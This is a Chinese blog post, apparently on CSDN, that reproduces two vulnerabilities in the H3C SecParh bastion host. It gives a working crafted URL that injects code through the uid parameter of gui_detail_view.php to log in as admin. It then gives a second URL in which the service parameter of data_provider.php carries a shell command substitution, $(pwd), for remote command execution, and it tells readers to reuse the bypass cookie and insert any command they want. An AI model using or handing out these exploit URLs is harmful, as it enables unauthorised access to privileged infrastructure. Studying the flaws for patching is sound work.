文章详细介绍了H3CSecParh堡垒机存在的两个重大安全问题:任意用户登录漏洞和远程命令执行漏洞。攻击者可通过构造特定URL利用这些漏洞,对系统造成潜在威胁。对于任意用户登录漏洞,作者展示了如何利用get_detail_view.php页面;而对于远程命令执行漏洞,攻击者需先登录并利用data_provider.php来执行命令。这两个漏洞都强调了网络安全的重要性。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
1.H3C SecParh堡垒机任意用户登录漏洞
1.1.漏洞描述
在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。
1.2.漏洞影响
H3C SecParh堡垒机
1.3.漏洞复现
1.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
1.3.2.构建URL
URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
1.4.总结
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。
2.H3C SecParh堡垒机远程命令执行漏洞
2.1.漏洞描述
H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。
2.2.漏洞影响
H3C SecParh堡垒机
2.3.漏洞复现
2.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
2.3.2.构建URL
URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true
需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
2.4.总结
我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
